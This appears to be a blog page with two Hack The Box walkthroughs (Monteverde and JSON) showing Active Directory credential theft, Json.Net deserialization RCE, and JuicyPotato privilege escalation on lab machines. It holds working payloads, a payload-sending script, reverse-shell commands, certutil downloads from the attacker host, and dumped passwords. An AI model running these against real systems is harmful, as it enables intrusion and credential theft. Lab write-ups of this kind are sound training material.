htb-monteverde-nl

As always we start with an nmap scan

# Nmap 7.80 scan initiated Mon Jan 13 07:39:41 2020 as: nmap -A -oN fullscan-A 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.081s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-13 12:50:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/13%Time=5E1C651E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m42s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-01-13T12:53:03
|_ start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 104.46 ms 10.10.16.1
2 104.61 ms 10.10.10.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 07:44:56 2020 -- 1 IP address (1 host up) scanned in 315.99 seconds

I found the users with:

root@kali:~/htb/monteverde# ldapsearch -h 10.10.10.172 -p 389 -x -b "dc=MEGABANK,dc=LOCAL" > ldaplogall.txt
Also found the following
# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103001011.0Z
whenChanged: 20200103001032.0Z
uSNCreated: 36889
uSNChanged: 36897
name: Azure Admins
objectGUID:: iCAImwQrNUW6YeEQTXxy+w==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103123551.0Z
dSCorePropagationData: 16010101000001.0Z
 login smb as SABatchJobs:SABatchJobs, and find a xml file in mhope home dir
root@kali:~/htb/monteverde# smbmap -u SABatchJobs -p SABatchJobs -d MEGABANK -H 10.10.10.172
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445 Name: MEGABANK.local 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
azure_uploads READ ONLY
C$ NO ACCESS
E$ NO ACCESS
IPC$ READ ONLY
NETLOGON READ ONLY
SYSVOL READ ONLY
users$ READ ONLY
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
.        D 0 Fri Jan 3 08:12:48 2020
..       D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope    D 0 Fri Jan 3 08:41:18 2020
roleary  D 0 Fri Jan 3 08:10:30 2020
smorgan  D 0 Fri Jan 3 08:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
.       D 0 Fri Jan 3 08:41:18 2020
..      D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \mhope\>
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs 
Enter WORKGROUP\SABatchJobs's password: SABatchJobs 
Try "help" to get a list of possible commands. smb: > ls . D 0 Fri Jan 3 08:12:48 2020 .. D 0 Fri Jan 3 08:12:48 2020 dgalanos D 0 Fri Jan 3 08:12:30 2020 mhope D 0 Fri Jan 3 08:41:18 2020 roleary D 0 Fri Jan 3 08:10:30 2020 smorgan D 0 Fri Jan 3 08:10:24 2020
root@kali:~/htb/monteverde# cat azure.xml 
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>

Because the file was in the “mhope” users directory, you can guess that this is his password: mhope: 4n0therD4y@n0th3r$

With evil-winrm you can connect to the victim and get the user’s flag:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f4eeb2ce3705e2f212f2

getting Root

If you look at the rights of this user, you can see that he is a member of the Azure Admins group:
Which means he can run a DCSync.

Running the attack is as easy as downloading the PS1 script from:

https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1

more info in:  https://blog.xpnsec.com/azuread-connect-for-redteam/

Next we execute:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /root/htb/monteverde/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\shellcode.xml
Info: Uploading /root/htb/monteverde/Azure-ADConnect.ps1 to c:\windows\system32\spool\drivers\color\shellcode.xml

Data: 3016 bytes of 3016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ren shellcode.xml Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ./Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Import-Module ./Azure-ADConnect.ps1 
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!

With the password of the administrator you can log in via winrm and get the root

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u administrator -p 'd0m@in4dminyeah!'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
12909612d25c8dcf6e5a07d1a804a0bc

After some failures:

root@kali:~/htb/monteverde# impacket-smbserver share ./
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
C:\windows\system32\spool\drivers\color>copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.172] 61971
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\spool\drivers\color>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID 
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601

--snip--

C:\windows\system32\spool\drivers\color>powershell -nop -Exec Bypass
certutil -urlcache -split -f http://10.10.16.70/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
  This script contains malicious content and has been blocked by your antivirus software.

Author : Puckiestyle

htb-json-nl

As always, first an nmap scan

root @ kali: ~ / htb / json # nmap -sV 10.10.10.158
Starting Nmap 7.80 (https://nmap.org) at 2020-01-13 03:59 EST
Nmap scan report for 10.10.10.158
Host is up (0.077s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21 / tcp open ftp FileZilla ftpd
80 / tcp open http Microsoft IIS httpd 8.5
135 / tcp open msrpc Microsoft Windows RPC
139 / tcp open netbios-ssn Microsoft Windows netbios-ssn
445 / tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152 / tcp open msrpc Microsoft Windows RPC
49153 / tcp open msrpc Microsoft Windows RPC
49154 / tcp open msrpc Microsoft Windows RPC
49155 / tcp open msrpc Microsoft Windows RPC
49156 / tcp open msrpc Microsoft Windows RPC
49157 / tcp open msrpc Microsoft Windows RPC
49158 / tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe: / o: microsoft: windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 62.63 seconds

The initial analysis of the ftp, smb and powershell ports turned out to be not very helpful, so I continued with the web pages.

The web page showed a login screen, but a simple guess with Admin: Admin as username / password combination let me in.

After analyzing all requests in Burpsuite, the request on / api / Account stood out because the name of the box is JSON and this is the only request with a JSON response. I looked closely at the request in Burp and noticed that it had an OAuth2 cookie and a Bearer token, so I kept concentrating on that using Curl.

c: \ PENTEST> curl -XGET http://10.10.10.158/api/Account 
{"Message": "Authorization has been denied for this request."} 
c: \ PENTEST> curl -XGET http://10.10.10.158 / api / Account --header "Cookie: OAuth2 = eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0 =" --header "Bearer: eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0 =" 
{ "id": 1, "UserName", "admin", "password", "21232f297a57a5a743894a0e4a801fc3", "Name" : "User Admin HTB", "Role": "Administrator"}

If I repeat the request with Curl, I get a JSON string back with an ID, the username, a password and some other stuff. So let’s take a closer look at that “Bearer string”.

root @ kali: ~ / htb / json # echo -n eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0 = | base64 -d 
{"Id": 1, "UserName": "admin", "Password": "21232f297a57a5a743894a0e4a801fc3", "Name": "User Admin HTB", "Role": "Administrator"}

Apparently, the value contains exactly the same that is returned. But what happens if I change the ID value (integer) to a string value.

root@kali:~/htb/json# echo -n {"Id":a,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"} | base64 |tr -d '\n'; echo
SWQ6YSBVc2VyTmFtZTphZG1pbiBQYXNzd29yZDoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMyBOYW1lOlVzZXIgQWRtaW4gSFRCIFJvbDpBZG1pbmlzdHJhdG9y

root@kali:~/htb/json# curl -XGET http://10.10.10.158/api/Account --header "Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" --header "Bearer: SWQ6YSBVc2VyTmFtZTphZG1pbiBQYXNzd29yZDoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMyBOYW1lOlVzZXIgQWRtaW4gSFRCIFJvbDpBZG1pbmlzdHJhdG9y"
{"Message":"An error has occurred.","ExceptionMessage":"Cannot deserialize Json.Net Object","ExceptionType":"System.Exception","StackTrace":null}r

So it gives an error because it cannot deserialize a Json.Net object. After some searching I came across this   document here it is specifically stated that this is not a JSON vulnerability but a Deserialization vulnerability, After looking a bit more, they specifically mention that Json.Net is also vulnerable. Apparently it should be possible to inject code if you have control over the Type value of the Serialized object. I started a python web server to host a custom nishang Powershell script as Ippsec shows in several videos

root@kali:~/JSON# cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 reverse.ps1
root@kalivm:~/JSON# echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.70 -Port 443" >> puckieshell443.ps1
root@kali:~/JSON# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

After that changed, I started creating the required Json.net payloads, as specifically stated in the Breeze demo of the Blackhat Talk.

see below the rce “proof of concept” with burp and ysoserial.exe and tcpdump

c: \ PENTEST \ ysoserial> ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.16.70" -t
{
'$ type': 'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35',
'MethodName': 'Start',
"MethodParameters": {
'$ type': 'System.Collections.ArrayList, mscorlib, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
'$ values': ['cmd', '/ c ping 10.10.16.70']
},
'ObjectInstance': {'$ type': 'System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089'}
}
c: \ PENTEST \ ysoserial>

While I was messing around with this stuff, I got tired of having to encode the payloads base64 and then resend it, so I decided to create a simple python script to do that for me.

root @ kali: ~ / htb / json # cat htb-json.py 
#! / usr / bin / env python3
from base64 import b64decode, b64encode
import requests
import argparse

parser = argparse.ArgumentParser (description = 'pass the attack script.')
parser.add_argument ("- s", '--script', required = True, 
help = 'script to process for the attack')
args = parser.parse_args ()

admin_token = "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0 ="
# Base64 encode the provided payload file
def create_payload (package):
payload = open (package, 'rb'). read ()
return b64encode (payload) .decode ('UTF-8')

#Send the payload file
print ("Sending payload:", args.script)
requests.get ('http://10.10.10.158/api/Account', 
headers = {
'Cookie': 'OAuth2 =' + admin_token, 
'Bearer': create_payload (args.script)
})

Quite a bit of a hassle later, I finally got the first load that PowerShell uses to invoke a request to transfer the modified PowerShell Reverse shell.

root@kali:~/htb/json# cat getPS1.plain 
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c powershell Invoke-WebRequest -Uri "http://10.10.16.70:8000/puckieshell443.ps1" -OutFile "c:\\windows\\temp\\sedje.ps1"']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}

root@kali:~/htb/json# python3 htb-json.py -s getPS1.plain
Sending payload:  getPS1.plain

And in the python web server shell I see the incoming GET request from the JSON box for the reverse.ps1 file.

root @ kali: ~ / htb # python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.158 - - [13 / Jan / 2020 03:04:51] "GET /puckieshell443.ps1 HTTP / 1.1" 200 -

The next step is to complete the object file that the PowerShell script calls, and after some hassle with that file I came across the following lines of code:

root @ kali: ~ / htb / json # cat execPS1.plain 
{
'$ type': 'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35', 
'MethodName': 'Start',
"MethodParameters": {
'$ type': 'System.Collections.ArrayList, mscorlib, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
'$ values': ['cmd', '/ c powershell c: \\ windows \\ temp \\ sedje.ps1']
},
'ObjectInstance': {'$ type': 'System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089'}
}

And in the Terminal while the netcat listener waits for a while, I see …

root @ kali: ~ / htb # rlwrap nc -nvvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.158] 49275
Windows PowerShell running as user JSON $ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C: \ windows \ system32 \ inetsrv>

Yes, I have a shell The next thing to do is look who I am and capture the user’s flag!

PS C:\windows\system32\inetsrv> whoami
json\userpool
PS C:\windows\system32\inetsrv> Get-Content c:\Users\userpool\Desktop\user.txt
34459a01f50050dc410db09bfb9f52bb34459a01

Additional note

I received feedback that the command I used in the payload could have been even simpler. Instead of the ‘cmd’ and ‘/ c’ approvals, the following would have been just as simple.

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['powershell','Invoke-WebRequest -Uri "http://10.10.16.70:8000/reverse.ps1" -OutFile "c:\\windows\\temp\\sedje.ps1"']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Privilege Escalation

After poking around and performing general PrivEsc actions, I find an interesting file in a Sync2FTP directory

PS C:\Program Files\Sync2Ftp> type SyncLocation.exe.config
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <appSettings>
    <add key="destinationFolder" value="ftp://localhost/"/>
    <add key="sourcefolder" value="C:\inetpub\wwwroot\jsonapp\Files"/>
    <add key="user" value="4as8gqENn26uTs9srvQLyg=="/>
    <add key="minute" value="30"/>
    <add key="password" value="oQ5iORgUrswNRsJKH9VaCw=="></add>
    <add key="SecurityKey" value="_5TL#+GWWFv6pfT3!GXw7D86pkRRTv+$$tk^cL5hdU%"/>
  </appSettings>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
  </startup>


</configuration>

The file appears to contain a username, password that looks like a base64 string and a security key. Decoding the base64 strings brought me some unreadable stuff so I decided to run the SyncLocation.exe file and it ran without any issues. Since the .exe file is likely to use the .config file, I copy both files to a writable folder so that I can transfer them out of the box for further analysis.

C:\Program Files\Sync2Ftp> mkdir c:\windows\temp\sedje
                                          
                                          
    Directory: C:\windows\temp            
                                          
                                          
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         10/5/2019   9:08 PM            sedje
                                                  
                                                  
PS C:\Program Files\Sync2Ftp> cd c:\windows\temp\sedje
PS C:\windows\temp\sedje> copy "C:\Program Files\Sync2Ftp\SyncLocation.exe" .
PS C:\windows\temp\sedje> copy "C:\Program Files\Sync2Ftp\SyncLocation.exe.config" .

Now that those files are ready, I have to start a local FTP server to catch the files. Python can easily do this using the pyftpdlib library.

root@kalivm:~/JSON# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-05 21:15:22] >>> starting FTP server on 0.0.0.0:21, pid=10105 < <<
[I 2019-10-05 21:15:22] concurrency model: async
[I 2019-10-05 21:15:22] masquerade (NAT) address: None
[I 2019-10-05 21:15:22] passive ports: None

In the Windows box, I create an ftp script and transfer the files to my local computer.

PS C: \ windows \ temp \ sedje> dir
Directory: C: \ windows \ temp \ sedje
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-ar-- 5/23/2019 2:48 PM 9728 SyncLocation.exe 
-a --- 5/23/2019 3:08 PM 591 SyncLocation.exe.config

PS C: \ windows \ temp \ sedje> echo "open 10.10.16.70"> ftp 
PS C: \ windows \ temp \ sedje> echo "anonymous" >> ftp 
PS C: \ windows \ temp \ sedje> echo ""> > ftp 
PS C: \ windows \ temp \ sedje> echo "put SyncLocation.exe" >> ftp 
PS C: \ windows \ temp \ sedje> echo "put SyncLocation.exe.config" >> ftp 
PS C: \ windows \ temp \ sedje> echo "quit" >> ftp 
PS C: \ windows \ temp \ sedje> ftp -s: ftp
ftp> open 10.10.16.70
Connected to 10.10.16.70.
220 pyftpdlib 1.5.4 ready.
User (10.10.16.70:(none)): 
331 Username ok, send password.

230 Login successful.
ftp> put SyncLocation.exe
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 9728 bytes sent in 0.16Seconds 62.36Kbytes / sec.
ftp> put SyncLocation.exe.config
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 591 bytes sent in 0.01Seconds 39.40Kbytes / sec.
ftp> quit
221 Goodbye.
PS C: \ windows \ temp \ sedje>

So the FTP script says the files are being transferred. Time to check the FTP server for the same.

root @ kali: ~ / htb / json # python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-13 05:33:01] >>> starting FTP server on 0.0.0.0:21, pid = 3848 <<<
[I 2020-01-13 05:33:01] concurrency model: async
[I 2020-01-13 05:33:01] masquerade (NAT) address: None
[I 2020-01-13 05:33:01] passive ports: None
[I 2020-01-13 05:35:07] 10.10.10.158:49859- [] FTP session opened (connect)
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[anonymous] USER 'anonymous' logged in.
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[anonymous] STOR /root/htb/json/SyncLocation.exe completed = 1 bytes = 9728 seconds = 0.28
[I 2020-01-13 05:35:08] 10.10.10.158:49859-[anonymous] STOR /root/htb/json/SyncLocation.exe.config completed = 1 bytes = 591 seconds = 0.14
[I 2020-01-13 05:35:08] 10.10.10.158:49859-[anonymous] FTP session closed (disconnect).
^ C [I 2020-01-13 05:37:28] received interrupt signal
[I 2020-01-13 05:37:28] >>> shutting down FTP server (1 active socket fds) <<<
root @ kali: ~ / htb / json # ls
execPS1.plain htb-json nmap-json.gnmap nmap-json.xml SyncLocation.exe.config
getPS1.plain htb-json.py nmap-json.nmap SyncLocation.exe
After the files are transferred, I transfer them to a local Windows VM, because it's easier than analyzing on Linux. I open .exe in dnspy.

In the binary, there is a clearly readable Decrypt () function that needs a key and a value to decode the base64 encoded strings. Since I'm not very good with .net stuff, I look for a simple solution online.

I find that solution in dotnetfiddle, an online tool that can run dotnet code. After modifying the code by adding the key and calling the function twice with the base64 string in it, I get the results.
Username: superadmin
Password: funnyhtb

Now there are still several places where I can try these login details. After some hassle with PowerShell privilege escalation, I got a hint that I should try a different path and try the FTP server.

c:\PENTEST>ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
202 UTF8 mode is always enabled. No need to send this command.
User (10.10.10.158:(none)): superadmin
331 Password required for superadmin
Password:
230 Logged onroot@kalivm:~/~# ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.158:root): superadmin
331 Password required for superadmin
Password:
230 Logged on
Remote system type is UNIX.

Bingo! Logged in to the FTP server, all that was left to do is check the desktop for the flag and get it!

ftp> dir Desktop
200 Port command successful
150 Opening data channel for directory listing of "/Desktop"
-r--r--r-- 1 ftp ftp            282 May 22  2019 desktop.ini
-r--r--r-- 1 ftp ftp             32 May 22  2019 root.txt
226 Successfully transferred "/Desktop"
ftp> get Desktop/root.txt ./root.txt
local: ./root.txt remote: Desktop/root.txt
200 Port command successful
150 Opening data channel for file download from server of "/Desktop/root.txt"
226 Successfully transferred "/Desktop/root.txt"
32 bytes received in 0.00 secs (223.2143 kB/s)
ftp> 221 Goodbye
root@kali:~/JSON# cat root.txt
3cc85d1bed2ee84af4074101b991d441

Also the juicypotato way to escalate to root!

When running systeminfo I saw it was a Windows Server 2012 Datacenter, it is most likely vulnerable to JuicyPotato.
So I uploaded the exploit, and searched  http://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter/ for a CLSID with NT
AUTHORITY \ SYSTEM permission, and run this nc.exe:

PS C: \ windows \ temp \ sedje> whoami / priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State 
============================= ===================== ==================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled 
SeImpersonatePrivilege Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C: \ windows \ temp \ sedje> certutil -urlcache -split -f http://10.10.16.70/nc.exe C: \ users \ userpool \ Downloads \ nc.exe
**** Online ****
0000 ...
6th
CertUtil: -URLCache command completed successfully.
PS C: \ windows \ temp \ sedje> certutil -urlcache -split -f http://10.10.16.70/juicypotato.exe C: \ users \ userpool \ Downloads \ juicypotato.exe
**** Online ****
000000 ...
054e00
CertUtil: -URLCache command completed successfully.
PS C: \ windows \ temp \ sedje> cd C: \ users \ userpool \ Downloads \ 
PS C: \ users \ userpool \ Downloads> . \ JuicyPotato.exe -l 1337 -pc: \ windows \ system32 \ cmd.exe - a "/ c C: \ users \ userpool \ Downloads \ nc.exe 10.10.16.70 53 -e cmd.exe" -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 1337
....
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334}; NT AUTHORITY \ SYSTEM

[+] CreateProcessWithTokenW OK
PS C: \ users \ userpool \ Downloads>
root @ kali: ~ / htb # python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.158 - - [13 / Jan / 2020 05:58:01] "GET /nc.exe HTTP / 1.1" 200 -
10.10.10.158 - - [13 / Jan / 2020 05:58:01] "GET /nc.exe HTTP / 1.1" 200 -
10.10.10.158 - - [13 / Jan / 2020 05:58:16] "GET /juicypotato.exe HTTP / 1.1" 200 -
10.10.10.158 - - [13 / Jan / 2020 05:58:17] "GET /juicypotato.exe HTTP / 1.1" 200 -
root @ kali: ~ / htb / json # rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.158] 49972
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C: \ Windows \ system32> whoami
whoami
nt authority \ system

C: \ Windows \ system32>

files used: https://github.com/puckiestyle/python/blob/master/htb-json.py

https://github.com/puckiestyle/pentest/blob/master/ysoserial.zip

https://github.com/puckiestyle/pentest/blob/master/juicypotato.exe

https://github.com/pwntester/ysoserial.net

root = 3cc85d1bed2ee84af4074101b991d441

Author: Puckiestyle

Protected: HTB-OPENADMIN-NL

This content is password protected. To view it please enter your password below:

Posted on

Protected: HTB-TRAVERXEC-NL

This content is password protected. To view it please enter your password below:

Posted on

HTB-CRAFT-NL

